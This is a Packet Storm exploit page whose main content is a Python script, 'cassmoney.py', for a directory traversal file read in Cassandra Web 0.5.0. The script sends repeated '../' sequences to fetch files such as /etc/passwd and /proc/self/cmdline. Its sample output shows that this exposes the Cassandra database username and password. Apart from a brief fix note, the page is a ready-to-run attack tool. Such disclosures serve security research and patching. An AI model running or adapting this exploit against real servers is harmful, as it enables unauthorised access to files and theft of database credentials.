what you don't know can hurt you

Cassandra Web 0.5.0 Remote File Read

Cassandra Web 0.5.0 Remote File Read
Posted Dec 29, 2020
Authored by Jeremy Brown

Cassandra Web is vulnerable to directory traversal due to the disabled Rack::Protection module. Apache Cassandra credentials are passed via the CLI in order for the server to auth to it and provide the web access, so they are also one thing that can be captured via the arbitrary file read. Version 0.5.0 is affected.

tags | exploit, web, arbitrary
MD5 | 5d45ddf35f9f55300493bfefe8020924

Cassandra Web 0.5.0 Remote File Read

Change Mirror Download
#!/usr/bin/python
# -*- coding: UTF-8 -*-
#
# cassmoney.py
#
# Cassandra Web 0.5.0 Remote File Read Exploit
#
# Jeremy Brown [jbrown3264/gmail]
# Dec 2020
#
# Cassandra Web is vulnerable to directory traversal due to the disabled
# Rack::Protection module. Apache Cassandra credentials are passed via the
# CLI in order for the server to auth to it and provide the web access, so
# they are also one thing that can be captured via the arbitrary file read.
#
# Usage
# > cassmoney.py 10.0.0.5 /etc/passwd
# root:x:0:0:root:/root:/bin/bash
# daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
# bin:x:2:2:bin:/bin:/usr/sbin/nologin
# ...
#
# > cassmoney.py 10.0.0.5 /proc/self/cmdline
# /usr/bin/ruby2.7/usr/local/bin/cassandra-web--usernameadmin--passwordP@ssw0rd
#
# (these creds are for auth to the running apache cassandra database server)
#
# Fix
# - fixed in github repo
# - v0.6.0 / ruby-gems when available
# (still recommended to containerize / run this in some sandbox, apparmor, etc)
#

import os
import sys
import argparse
import requests
import urllib.parse

SIGNATURE = 'cassandra.js'

#
# /var/lib/gems/2.7.0/gems/cassandra-web-0.5.0/app/public
#
DT = '../'
DT_NUM = 8

class CassMoney(object):
def __init__(self, args):
self.target = args.target
self.file = args.file
self.port = args.port
self.force = args.force
self.number = args.number

def run(self):
target = "http://" + self.target + ':' + str(self.port)

payload = urllib.parse.quote_plus(DT * self.number + self.file)

try:
deskpop = requests.get(target)
except Exception as error:
print("Error: %s" % error)
return -1

if(SIGNATURE not in deskpop.text and self.force == False):
print("Target doesn't look like Cassandra Web, aborting...")
return -1

try:
req = requests.get(target + '/' + payload)
except:
print("Failed to read %s (perm denied likely)" % self.file)
return -1

if(SIGNATURE in req.text):
print("Failed to read %s (bad path?)" % self.file)
return -1

if(len(req.text) == 0):
print("Server returned nothing for some reason")
return 0

print("\n%s" % req.text)

return 0

def arg_parse():
parser = argparse.ArgumentParser()

parser.add_argument("target",
type=str,
help="Cassandra Web Host")

parser.add_argument("file",
type=str,
help="eg. /etc/passwd, /proc/sched_debug + /proc/<cass-web-pid>/cmdline")

parser.add_argument("-p",
"--port",
type=int,
default=3000,
help="Cassandra Web Port")

parser.add_argument("-f",
"--force",
default=False,
action='store_true',
help="Run the payload even if server isn't Cassandra Web")

parser.add_argument("-n",
"--number",
type=int,
default=DT_NUM,
help="Adjust the number of dot-dot-slash")

args = parser.parse_args()

return args

def main():
args = arg_parse()

cm = CassMoney(args)

result = cm.run()

if(result > 0):
sys.exit(-1)

if(__name__ == '__main__'):
main()
Login or Register to add favorites

File Archive:

January 2021

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jan 1st
    4 Files
  • 2
    Jan 2nd
    3 Files
  • 3
    Jan 3rd
    3 Files
  • 4
    Jan 4th
    33 Files
  • 5
    Jan 5th
    31 Files
  • 6
    Jan 6th
    21 Files
  • 7
    Jan 7th
    15 Files
  • 8
    Jan 8th
    19 Files
  • 9
    Jan 9th
    1 Files
  • 10
    Jan 10th
    1 Files
  • 11
    Jan 11th
    33 Files
  • 12
    Jan 12th
    19 Files
  • 13
    Jan 13th
    27 Files
  • 14
    Jan 14th
    8 Files
  • 15
    Jan 15th
    16 Files
  • 16
    Jan 16th
    1 Files
  • 17
    Jan 17th
    2 Files
  • 18
    Jan 18th
    20 Files
  • 19
    Jan 19th
    32 Files
  • 20
    Jan 20th
    12 Files
  • 21
    Jan 21st
    0 Files
  • 22
    Jan 22nd
    0 Files
  • 23
    Jan 23rd
    0 Files
  • 24
    Jan 24th
    0 Files
  • 25
    Jan 25th
    0 Files
  • 26
    Jan 26th
    0 Files
  • 27
    Jan 27th
    0 Files
  • 28
    Jan 28th
    0 Files
  • 29
    Jan 29th
    0 Files
  • 30
    Jan 30th
    0 Files
  • 31
    Jan 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close